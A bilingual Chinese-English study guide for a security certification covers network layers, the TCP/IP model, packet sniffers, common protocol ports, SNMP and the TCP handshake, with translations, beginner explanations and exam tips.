Physical Layer The Physical Layer (Layer 1) converts a frame into bits for transmission over the physical connection medium, and vice versa for receiving communications. Network hardware devices that function at Layer 1, the Physical Layer, are NICs, hubs, repeaters, concentrators, and amplifiers. These devices perform hardware-based signal operations, such as sending a signal from one connection port out on all other ports (a hub) or amplifying the signal to support greater transmission distances (a repeater).

中文直译 / 整理

在数据链路层对网络容器执行的部分处理包括将源和目的硬件地址添加到 帧中。 硬件地址是媒体访问控制(MAC)地址,它是一个6字节(48位)的二 进制地址,采用十六进制表示法(例如,00‑13‑02‑1F‑58‑F5)。 此地址也被称 为物理地址、NIC地址和以太网地址。 该地址的前3字节(24位)是组织唯一标 识符(OUI),用于标识物理网络接口的供应商或制造商。 OUI由电气和电子 工程师协会(IEEE)注册并控制其发放。 通过IEEE网站,可以使用OUI来发 现NIC的制造商,网址为 http://standards.ieee.org/products-services/regauth/index.html。 MAC地 址的最后3个字节(24位)表示制造商分配给该接口的唯一编号。 一些制造商会 在这些最后的24位中编码信息,这些信息可能代表设备的制造商、型号、生产 批次以及唯一值。 因此,一些使用唯一NIC的设备(如移动设备、物联网设备 和嵌入式系统)可以通过其MAC地址进行识别。 在OSI模型的数据链路层(第2层)协议中,您应熟悉地址解析协议(ARP)。 请参见本章后面“ARP注意事项”部分。

在第2层(数据链路层)工作的网络硬件设备是交换机和网桥。 这些设备支持 基于MAC地址的流量路由。 交换机从一个端口接收帧,并根据目标MAC地址 将其从另一个端口发送出去。 MAC地址目标用于确定帧是否通过网桥从一个 网络段传输到另一个网络段。 物理层 物理层(第1层)将帧转换为比特,以便通过物理连接介质传输,反之亦然, 用于接收通信。 工作在第1层(物理层)的网络硬件设备包括网卡、集线器、中继器、集中器 和放大器。 这些设备执行基于硬件的信号操作,例如将信号从一个连接端口 发送到所有其他端口(集线器),或放大信号以支持更长的传输距离(中继 器)。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

网络题先定位层次,再判断协议、设备或攻击位置。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
标准 标准给出必须满足的最低要求。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 14 / PDF P732

第 732 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

TCP/IP Model The TCP/IP model (also called the DARPA model or the DOD model) consists of only four layers, as opposed to the OSI reference model's seven. The four layers of the TCP/IP model are Application (also known as Process), Transport (also known as Host-to-Host), Internet (sometimes Internetworking), and Link (although Network Interface and sometimes Network Access are also used). Figure 11.5 shows how they compare to the seven layers of the OSI model. The TCP/IP protocol suite was developed before the OSI Reference Model was created. FIGURE 11.5 Comparing the OSI model with the TCP/IP model TCP/IP

中文直译 / 整理

模型 该TCP/IP模型(也称为DARPA模型或DOD模型)仅包含四层,而OSI参考模型 有七层。 TCP/IP模型的四层分别是应用层(也称为进程层)、传输层(也称为 主机到主机层)、互联网层(有时称为互连网络层)和链路层(尽管也使用网 络接口层和有时网络访问层)。 图11.5展示了它们与OSI模型七层的对比。 TCP/IP协议套件是在OSI参考模型创建之前开发的。 图 11.5 OSI 模型与 TCP/IP 模型的比较

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 732 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

考试常让你把协议、端口、层次对应起来。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
学习单元 15 / PDF P733

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Since the TCP/IP model layer names and the OSI model layer names can be used interchangeably, it is important to know which model is being addressed in various contexts. Unless informed otherwise, always assume that the OSI model provides the basis for discussion because it's the most widely used network reference model. The TCP/IP model was derived directly from the TCP/IP protocol suite or stack comprising hundreds of individual protocols. TCP/IP is a platformindependent protocol based on open standards.

TCP/IP can be found in just about every available operating system, but it consumes a significant amount of resources and is relatively easy to hack, because it was originally designed for ease of use and interoperability rather than for security. TCP/IP's vulnerabilities are numerous. Improperly implemented TCP/IP stacks in various operating systems are vulnerable to buffer overflows, SYN flood attacks, various denial-of-service (DoS) attacks, fragment attacks, oversized packet attacks, spoofing attacks, adversary-in-the-middle attacks (AitM), hijack attacks, and coding error attacks. TCP/IP (as well as most protocols) is also subject to passive attacks via monitoring or sniffing.

Eavesdropping and other attacks are discussed in more detail at the end of Chapter 12. Analyzing Network Traffic Network communications analysis is often an essential function in managing a network. It can be useful in tracking down malicious communications, detecting errors, or resolving transmission problems. However, network eavesdropping may also be used to violate communication confidentiality and/or serve as the information-gathering phase of a subsequent attack. A protocol analyzer is a tool used to examine the contents of network traffic. A protocol analyzer can be a dedicated hardware device or software installed on a typical host system.

A protocol analyzer is a frame/packet-capturing tool that can collect network traffic and store it in memory or on a storage device. Once a frame or packet is captured, it can be analyzed either with complex automated tools and scripts or manually. A protocol analyzer may also be called a sniffer, network evaluator, network analyzer, traffic monitor, or

中文直译 / 整理

由于TCP/IP模型层名称和OSI模型层名称可以互换使用,因此在不同上 下文中了解所涉及的是哪个模型非常重要。 除非另有说明,否则应始终假设 OSI模型是讨论的基础,因为它是使用最广泛的网络参考模型。 TCP/IP模型直接源自TCP/IP协议套件或协议栈,该套件包含数百个独立协议。 TCP/IP是一种基于开放标准的平台无关协议。 TCP/IP几乎存在于所有可用的 操作系统中,但它消耗大量资源,且相对容易被攻击,因为其最初设计时侧重 于易用性和互操作性,而非安全性。 TCP/IP的漏洞众多。 各种操作系统中实现不当的TCP/IP协议栈容易遭受缓 冲区溢出、SYN洪水攻击、各种拒绝服务(DoS)攻击、分片攻击、超大包 攻击、欺骗攻击、中间人攻击(AitM)、劫持攻击和编码错误攻击。 TCP/IP(以及大多数协议)也容易受到通过监控或嗅探进行的被动攻击。 窃听和其他攻击在第12章的末尾有更详细的讨论。 分析网络流量 网络通信分析通常是管理网络的一项重要功能。 它可用于追踪恶意通信、检测 错误或解决传输问题。 然而,网络窃听也可能被用来违反通信机密性,或作为 后续攻击的信息收集阶段。

一个 协议分析仪 是一种用于检查网络流量内容的工具。 协议分析仪可以是专 用的硬件设备,也可以是安装在普通主机系统上的软件。 协议分析仪是一种帧/ 数据包捕获工具,能够收集网络流量并将其存储在内存或存储设备中。 一旦捕 获了帧或数据包,就可以使用复杂的自动化工具和脚本,或手动进行分析。 协 议分析仪也可能被称为 嗅探器、网络评估器、网络分析仪、流量监控器 或

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

标准:标准给出必须满足的最低要求。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

Minimum level、mandatory requirement 常对应 standard。

网络题先定位层次,再判断协议、设备或攻击位置。

考试常让你把协议、端口、层次对应起来。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
标准 标准给出必须满足的最低要求。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
学习单元 16 / PDF P734

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

packet-capturing utility. A sniffer is generally a packetor frame-capturing tool, whereas a protocol analyzer is able to decode and interpret packet/frame contents. A protocol analyzer usually places the NIC into promiscuous mode to see and capture all Ethernet frames on the local network segment. In promiscuous mode, the NIC ignores the destination MAC addresses of Ethernet frames and collects each frame that reaches the interface. The protocol analyzer can examine individual frames down to the binary level. Most analyzers or sniffers automatically parse out the contents of the header into an expandable outline form. Any configuration or setting can be easily seen in the header details.

The payload of packets is often displayed in both hexadecimal and ASCII. Protocol analyzers typically offer both capture filters and display filters. A capture filter is a set of rules to govern which frames are saved into the capture file or buffer and which are discarded. A display filter is used to show only those frames from the packet file or buffer that match your requirements. Protocol analyzers vary from simple raw frame/packet-capturing tools to fully automated analysis engines. There are both open source (such as Wireshark) and commercial (such as Omnipeek, NetWitness, and NetScout) options.

Common Application Layer Protocols In the Application Layer of the OSI model reside numerous applicationor service-specific protocols: Telnet, TCP Port 23 This is a terminal emulation network application that supports remote connectivity for executing commands and running applications but does not support the transfer of files. Telnet should not be used; replace it with SSH. File Transfer Protocol (FTP), TCP Ports 20 (Active Mode Data Connection)/Ephemeral (Passive Mode Data Connection) and 21 (Control Connection) This is a network application that supports an exchange of files that requires anonymous or specific authentication. FTP should not be used; replace it with SFTP or FTPS.

Trivial File Transfer Protocol (TFTP), UDP Port 69 This is a network application that supports an exchange of files that does not require

中文直译 / 整理

数据包捕获工具。 嗅探器通常是一种数据包或帧捕获工具,而协议分析仪则能 够解码和解释数据包/帧的内容。 协议分析仪通常将网络接口卡(NIC)置于混杂模式,以查看并捕获本地网络 段上的所有以太网帧。 在混杂模式下,NIC会忽略以太网帧的目的MAC地址, 并收集每个到达接口的帧。 协议分析仪可以逐帧检查到二进制级别。 大多数分析仪或嗅探器会自动将报头 内容解析为可展开的提纲形式。 任何配置或设置都可以在报头详细信息中轻松 查看。 数据包的有效负载通常以十六进制和ASCII两种形式显示。 协议分析仪通常提供捕获过滤器和显示过滤器。 捕获过滤器是一组规则,用于 决定哪些帧被保存到捕获文件或缓冲区中,哪些被丢弃。 显示过滤器用于仅显 示符合您要求的报文文件或缓冲区中的帧。 协议分析仪从简单的原始帧/报文捕获工具到完全自动化的分析引擎不等。 既有开源选项 (如Wireshark),也有商业选项(如Omnipeek、NetWitness和NetScout)。

常见应用层协议 在OSI模型的应用层中,存在大量特定于应用或服务的协议: Telnet,TCP端口23 这是一种终端仿真网络应用程序,支持远程连接以执行 命令和运行应用程序,但不支持文件传输。 不应使用Telnet; 请用SSH替代。 文件传输协议(FTP),TCP端口20(主动模式数据连接)/临时端口(被动 模式数据连接)和21(控制连接) 这是一种支持文件交换的网络应用程序, 需要匿名或特定身份验证。 不应使用FTP; 请用SFTP或FTPS替代。 简单文件传输协议(TFTP),UDP 端口 69 这是一种支持文件传输的网络应用 程序,无需

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 17 / PDF P735

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

authentication. Used to host network device configuration files and can support multicasting. TFTP should not be used. Simple Mail Transfer Protocol (SMTP), TCP Port 25 This is a protocol used to transmit email messages from a client to an email server and from one email server to another. Only use if encrypted with TLS to create SMTPS (i.e., STARTTLS, explicit TLS, or opportunistic TLS) over TCP port 587 or implicit SMTPS over TCP port 465. Post Office Protocol (POP3), TCP Port 110 This is a protocol used to pull email messages from an inbox on an email server down to an email client (aka client archiving). Only use if encrypted with TLS to create POPS on TCP port 995.

Internet Message Access Protocol (IMAP4), TCP Port 143 This is a protocol used to pull email messages from an inbox on an email server down to an email client. IMAP offers the ability to retrieve only headers from an email server as well as to delete messages directly off the email server (i.e., server archiving). Only use if encrypted with TLS to create IMAPS on TCP port 993. Dynamic Host Configuration Protocol (DHCP), UDP Ports 67 (server) and 68 (client) DHCP provides for centralized control of TCP/IP configuration settings assigned to systems upon bootup.

Hypertext Transfer Protocol (HTTP), TCP Port 80 This is the protocol used to transmit web page elements from a web server to web browsers in cleartext. Hypertext Transfer Protocol Secure (HTTPS) TCP Port 443 This is the TLS-encrypted version of HTTP. (HTTPS with TLS does support use of TCP port 80—but only for server-to-server communications.) Line Printer Daemon (LPD), TCP Port 515 This is a network service that is used to spool print jobs and send print jobs to printers. Consider enclosing in a VPN for use. X Window, TCP Ports 6000–6063 This is a GUI API for command-line operating systems. Consider enclosing it in a VPN for use.

Network File System (NFS), TCP Port 2049 This is a network service used to support file sharing between dissimilar systems. Consider enclosing it in a VPN for use.

中文直译 / 整理

身份验证。 用于托管网络设备配置文件,并可支持组播。 不应使用 TFTP。 简单邮件传输协议(SMTP), TCP端口25 这是一种用于将电子邮件消息从客户 端传输到邮件服务器,以及从一个邮件服务器传输到另一个邮件服务器的协议。 仅在使用TLS加密以在TCP端口587上创建SMTPS(即STARTTLS、显式TLS或 机会性TLS)或在TCP端口465上创建隐式SMTPS时使用。 邮局协议(POP3),TCP端口110 这是一种用于将邮件服务器收件箱中的电子邮 件消息拉取到电子邮件客户端的协议(即客户端归档)。 仅在使用TLS加密以在 TCP端口995上创建POPS时使用。 互联网消息访问协议(IMAP4), TCP端口143 这是一种用于将邮件服务器收件 箱中的电子邮件消息拉取到电子邮件客户端的协议。 IMAP支持仅从邮件服务器 检索邮件标题,以及直接在邮件服务器上删除邮件(即服务器归档)。 仅在使 用TLS加密以在TCP端口993上创建IMAPS时使用。 动态主机配置协议(DHCP), UDP 端口 67(服务器)和 68(客户端) DHCP 用于在系统启动时集中控制分配给系统的 TCP/IP 配置设置。

超文本传输协议(HTTP), TCP 端口 80 这是用于以明文形式从 Web 服务器向 Web 浏览器传输网页元素的协议。 安全超文本传输协议(HTTPS) TCP 端口 443 这是 HTTP 的 TLS 加密版本。 (使用 TLS 的 HTTPS 支持使用 TCP 端口 80,但仅限于服务器到服务器的通信。 ) 行式打印机守护进程(LPD), TCP 端口 515 这是一种用于排队打印作业并 将打印作业发送到打印机的网络服务。 建议在使用时将其置于 VPN 中。 XWindow, TCP 端口 6000–6063 这是命令行操作系统的图形用户界面 API。 建 议在使用时将其置于 VPN 中。 网络文件系统(NFS), TCP 端口 2049 这是一种用于支持不同系统之间文件共 享的网络服务。 建议在使用时将其置于 VPN 中。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

网络题先定位层次,再判断协议、设备或攻击位置。

考试常让你把协议、端口、层次对应起来。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
身份 身份是主体在系统中的标识。
学习单元 18 / PDF P736

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Simple Network Management Protocol (SNMP), UDP Port 161 (UDP Port 162 for Trap Messages) This is a network service used to collect network health and status information from a central monitoring station. Use the secure SNMPv3 only. SNMPv3 Simple Network Management Protocol (SNMP) is a standard networkmanagement protocol supported by most network devices and TCP/IPcompliant hosts. These include routers, switches, WAPs, firewalls, VPNs, printers, and so on. From a management console, you can use SNMP to interact with various network devices to obtain status information, performance data, statistics, and configuration details.

Some devices support the modification of configuration settings through SNMP. Early versions of SNMP relied on plaintext transmission of community strings as authentication. Communities are named collections of network devices. The original default community names were public and private. The latest version of SNMP allows for encrypted communications, as well as robust authentication protection. UDP port 161 is used by the SNMP agent (that is, the network device) to receive requests, and UDP port 162 is used by the management console to receive responses and notifications (also known as trap messages).

Trap messages inform the management console when an event or threshold violation occurs on a monitored system. Transport Layer Protocols When a connection is established via the Transport Layer, it is done using ports. Since port numbers are 16-digit binary numbers, the total number of ports is 2^16, or 65,536, numbered from 0 through 65,535. Ports allow a single IP address to support multiple simultaneous communications, each using a different port number (i.e., multiplexing over IP). The combination of an IP address and a port number is known as a socket. The first 1,024 of these ports (0–1,023) are called the well-known ports or the service ports.

These ports are reserved for use exclusively by servers.

中文直译 / 整理

简单网络管理协议(SNMP), UDP 端口 161(UDP 端口 162 用于陷阱消 息) 这是一种用于从中央监控站收集网络健康和状态信息的网络服务。 请仅 使用安全的 SNMPv3。 SNMPv3 简单网络管理协议(SNMP)是一种标准的网络管理协议,被大多数网络 设备和TCP/IP兼容主机支持。 这些设备包括路由器、交换机、无线接入点、 防火墙、VPN、打印机等。 通过管理控制台,您可以使用SNMP与各种网 络设备交互,以获取状态信息、性能数据、统计信息和配置详情。 某些设 备支持通过SNMP修改配置设置。 早期版本的SNMP依赖于以明文传输社区字符串进行身份验证。 社区是命 名的网络设备集合。 最初的默认社区名称为public和private。 SNMP的最 新版本支持加密通信以及强大的身份验证保护。 SNMP代理(即网络设备)使用UDP端口161接收请求,而管理控制台使用 UDP端口162接收响应和通知(也称为陷阱消息)。 陷阱消息在受监控系统 发生事件或阈值违规时通知管理控制台。 传输层协议 当通过传输层建立连接时,使用端口进行。

由于端口号是16位二进制数,因此 端口总数为2^16,即65,536个,编号从0到65,535。 端口允许单个IP地址支持 多个同时通信,每个通信使用不同的端口号(即在IP上多路复用)。 IP地址和 端口号的组合称为套接字。 这些端口中的前1,024个(0–1,023)称为知名端口或服务端口。 这些端口专供服务 器使用。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

考试常让你把协议、端口、层次对应起来。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
防火墙 防火墙根据规则控制网络流量进出。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
身份 身份是主体在系统中的标识。
学习单元 19 / PDF P737

第 737 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Ports 1,024 to 49,151 are known as the registered software ports. These are ports that have one or more networking software products specifically registered with the Internet Assigned Numbers Authority (IANA) at http://iana.org. Ports 49,152 to 65,535 are known as random, dynamic, or ephemeral ports because they are often used randomly and temporarily by clients as source ports. However, most operating systems allow for any port from 1,024 to be used as a dynamic client source port as long as it is not already in use on that local system. The two primary Transport Layer protocols of TCP/IP are TCP and UDP.

Transmission Control Protocol (TCP) is a full-duplex connection-oriented protocol, whereas User Datagram Protocol (UDP) is a simplex connectionless protocol. Transmission Control Protocol (TCP) supports full-duplex communications, is connection-oriented, and employs reliable sessions. TCP is connectionoriented because it employs a handshake process between two systems to establish a communication session. The three-way handshake process (Figure 11.6) is as follows: 1. The client sends a SYN (synchronize) flagged packet to the server. 2. The server responds with a SYN/ACK (synchronize and acknowledge) flagged packet back to the client. 3.

The client responds with an ACK (acknowledge) flagged packet back to the server.

中文直译 / 整理

端口1,024至49,151被称为注册软件端口。 这些端口有一个或多个网络软件产 品专门在http://iana.org向互联网编号分配机构(IANA)注册。 端口 49,152 到 65,535 被称为 随机的、动态的 或 临时端口,因为它们通常被 客户端随机且临时地用作源端口。 然而,大多数操作系统允许使用 1,024 及以 上的任意端口作为动态客户端源端口,只要该端口在本地系统上未被占用。 TCP/IP 的两个主要传输层协议是 TCP 和 UDP。 传输控制协议(TCP) 是一 种全双工面向连接的协议,而 用户数据报协议(UDP) 是一种单工无连接的协 议。 传输控制协议(TCP)支持全双工通信,是面向连接的,并采用可靠的会话。 TCP 是面向连接的,因为它在两个系统之间采用握手过程来建立通信会话。 三次握手过程(图 11.6)如下: 1. 客户端向服务器发送一个带有 SYN(同步)标志的数据包。 2. 服务器响应一个带有 SYN/ACK(同步和确认)标志的数据包给客户端。 3. 客户端响应一个带有 ACK(确认)标志的数据包给服务器。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 737 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

考试常让你把协议、端口、层次对应起来。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
学习单元 20 / PDF P738

第 738 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 11.6 The TCP three-way handshake When a communication session is complete, there are two methods to disconnect the TCP session. First, and most common, is the use of FIN (finish) flagged packets to gracefully initiate session shutdown. Second is the use of an RST (reset) flagged packet, which causes an immediate and abrupt session termination. TCP should be employed when the delivery of data is required. In the event that all packets of a transmission window were not received, no acknowledgment is sent. After a timeout period, the sender will resend the entire transmission window set of packets again.

TCP guarantees delivery because it will continue to resend any unacknowledged window of segments until it receives an acknowledgment, it receives an RST, the local application terminates the network communication attempts, or power is removed from the system. User Datagram Protocol (UDP) also operates at Layer 4 (the Transport Layer) of the OSI model. It is a connectionless “best-effort” communications protocol. It offers no standard error detection (other than an optional packet checksum) or correction, does not use sequencing, does not use flow control mechanisms, does not use a preestablished session, and is considered

中文直译 / 整理

图 11.6 TCP 三次握手 当通信会话完成时,有两种方法可以断开 TCP 会话。 第一种,也是最常见的 方式,是使用 FIN(结束)标志的数据包优雅地启动会话关闭。 第二种是使用 RST(重置)标志的数据包,这会导致会话立即且突然终止。 当需要确保数据交付时,应使用 TCP。 如果传输窗口中的所有数据包均未收 到,则不发送确认。 超时后,发送方将重新发送整个传输窗口的数据包集。 TCP 通过持续重传任何未确认的窗口段,直到收到确认、收到 RST、本地应 用程序终止网络通信尝试或系统断电,来保证交付。 用户数据报协议(UDP)也工作在OSI模型的第4层(传输层)。 它是一种无连 接的“尽力而为”通信协议。 它不提供标准的错误检测(除可选的数据包校验 和外)或纠错,不使用序列号,不使用流量控制机制,不使用预先建立的会话, 并且被认为是

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

